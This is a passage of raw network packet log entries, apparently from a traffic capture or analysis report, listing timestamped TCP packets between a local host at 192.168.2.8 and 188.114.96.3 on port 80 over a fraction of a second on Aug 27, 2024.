                                Aug 27, 2024 09:49:38.272454977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272521973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272536039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272551060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272559881 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.272619009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272627115 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.272631884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272644997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272658110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272669077 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.272706985 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.272717953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272737026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272747993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272778034 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.272814035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272869110 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.272922993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272933960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272943974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272954941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272967100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272978067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273005009 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.273027897 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.273072958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273083925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273093939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273106098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273116112 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.273154974 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.273236036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273247957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273258924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273269892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273282051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273293972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273304939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273320913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273345947 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.273379087 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.273396015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273406982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273425102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273437023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273447990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273453951 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.273458958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273474932 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.273503065 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.273622036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273633003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273726940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273736000 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.273737907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273778915 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.273822069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273833036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273844957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273855925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273866892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273878098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273889065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273920059 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.273947954 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.273971081 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273982048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.273993969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274005890 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.274029970 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.274056911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274070024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274080992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274116039 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.274147987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274158955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274168968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274179935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274190903 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.274192095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274204016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274214029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274214983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.274224997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274238110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274250031 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.274285078 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.274306059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274425983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274435997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274447918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274485111 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.274518967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274529934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274540901 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.274542093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274560928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274569035 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.274609089 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.274687052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274698019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274712086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274722099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274734974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274745941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274755955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274774075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274794102 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.274813890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274823904 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.274835110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274849892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274863005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274880886 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.274907112 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.274930000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274941921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274952888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274965048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274972916 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.274981976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.274995089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275007010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275021076 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.275032043 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.275099039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275113106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275124073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275140047 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.275156021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275166988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.275168896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275181055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275192022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275203943 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.275228977 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.275239944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275329113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275340080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275352955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275365114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275377035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275387049 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.275443077 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.275466919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275468111 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.275480032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275490046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275511026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275521040 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.275522947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275533915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275547028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275547028 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.275573969 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.275758028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275774002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275787115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275796890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275809050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275819063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275830984 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275841951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.275854111 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.275878906 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.359129906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359144926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359163046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359174013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359185934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359199047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359211922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359249115 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.359347105 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.359523058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359534025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359560013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359570980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359575987 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.359584093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359596968 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.359600067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359611988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359659910 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.359679937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359688997 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.359692097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359703064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359714985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359724045 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.359730005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359762907 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.359857082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359868050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359880924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359893084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359906912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359906912 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.359927893 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.359987020 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.359987020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.359998941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360009909 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360022068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360037088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360044956 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.360070944 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.360184908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360194921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360204935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360217094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360228062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360239983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360263109 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.360285997 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.360347986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360358953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360368967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360380888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360392094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360403061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360428095 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.360445976 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.360497952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360508919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360521078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360529900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360547066 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.360594988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.360614061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360625029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360630989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360642910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360662937 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.360838890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360850096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360860109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360887051 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.360905886 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360917091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360929012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.360939980 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.360972881 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.360991955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361004114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361013889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361026049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361032963 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.361037016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361047983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361057043 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.361058950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361072063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361076117 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.361095905 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.361207962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361218929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361228943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361241102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361252069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.361299038 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.361443043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361453056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361464024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361512899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361521959 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.361525059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361536026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361546993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361547947 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.361566067 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.361576080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361584902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361591101 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.361618996 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.361638069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361648083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361665010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361675024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.361690998 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.361712933 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.362190962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362226963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362237930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362266064 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.362349033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362360954 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362373114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362385035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362392902 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.362416983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.362505913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362523079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362535954 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362548113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362550020 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.362560987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362571001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362575054 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.362582922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362593889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362605095 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.362608910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362627983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.362649918 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.362849951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362860918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362870932 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362881899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362894058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362895012 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.362905025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362912893 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.362916946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362927914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362938881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362946987 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.362948895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.362976074 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.363022089 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.363173008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.363183975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.363193989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.363205910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.363218069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.363229036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.363235950 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.363240004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.363251925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.363265038 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.363267899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.363298893 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.363385916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.363396883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.363409042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.363418102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.363435030 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.363488913 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.446053028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446082115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446093082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446140051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446151972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446163893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446175098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446186066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446207047 CEST4971580192.168.2.8188.114.96.3
